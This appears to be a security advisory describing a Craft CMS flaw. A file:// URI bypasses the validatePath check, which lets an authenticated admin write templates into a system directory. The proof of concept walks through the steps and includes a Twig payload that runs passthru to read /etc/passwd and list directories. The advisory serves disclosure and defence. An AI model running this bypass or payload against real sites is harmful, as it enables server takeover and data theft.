- "details": "### Summary\nBypassing the validatePath function can lead to potential Remote Code Execution\n(Post-authentication, ALLOW_ADMIN_CHANGES=true)\n\n### Details\n\nIn bootstrap.php, the SystemPaths path is set as below.\n```php\n// Set the vendor path. By default assume that it's 4 levels up from here\n$vendorPath = $findConfigPath('--vendorPath', 'CRAFT_VENDOR_PATH') ?? dirname(__DIR__, 3);\n\n// Set the \"project root\" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/.\n$rootPath = $findConfigPath('--basePath', 'CRAFT_BASE_PATH') ?? dirname($vendorPath);\n\n// By default the remaining directories will be in the base directory\n$dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT_DOTENV_PATH') ?? \"$rootPath/.env\";\n$configPath = $findConfigPath('--configPath', 'CRAFT_CONFIG_PATH') ?? \"$rootPath/config\";\n$contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT_CONTENT_MIGRATIONS_PATH') ?? \"$rootPath/migrations\";\n$storagePath = $findConfigPath('--storagePath', 'CRAFT_STORAGE_PATH') ?? \"$rootPath/storage\";\n$templatesPath = $findConfigPath('--templatesPath', 'CRAFT_TEMPLATES_PATH') ?? \"$rootPath/templates\";\n$translationsPath = $findConfigPath('--translationsPath', 'CRAFT_TRANSLATIONS_PATH') ?? \"$rootPath/translations\";\n$testsPath = $findConfigPath('--testsPath', 'CRAFT_TESTS_PATH') ?? \"$rootPath/tests\";\n```\n\nBecause paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()\n```php\n /**\n * @param string $attribute\n * @param array|null $params\n * @param InlineValidator $validator\n * @return void\n * @since 4.4.6\n */\n public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void\n {\n // Make sure it’s not within any of the system directories\n $path = FileHelper::absolutePath($this->getRootPath(), '/');\n\n $systemDirs = Craft::$app->getPath()->getSystemPaths();\n\n foreach ($systemDirs as $dir) {\n $dir = FileHelper::absolutePath($dir, '/');\n if (str_starts_with(\"$path/\", \"$dir/\")) {\n $validator->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));\n break;\n }\n }\n }\n```\n\nref. https://www.php.net/manual/en/wrappers.file.php\n\n\n\n### PoC\n1) Create a new filesystem. **Base Path: file:///var/www/html/templates**\n\n\n\n\n2) Create a new asset volume. Asset Filesystem: local_bypass\n\n\n\n\n3) Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates\n```twig\n{{'<pre>'}}\n{{1337*1337}}\n{{['cat /etc/passwd']|map('passthru')|join}}\n{{['id;pwd;ls -altr /']|map('passthru')|join}}\n```\n\n\n\n\n4) Create a new route. URI: * , Template: poc.ttml\n\n\n\n\n5) Confirm RCE on arbitrary path ( /* )\n\n\n\n\n#### PoC Env\n\n\n\n\n### Impact\nTake control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.\n\nalthough the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)\n",
0 commit comments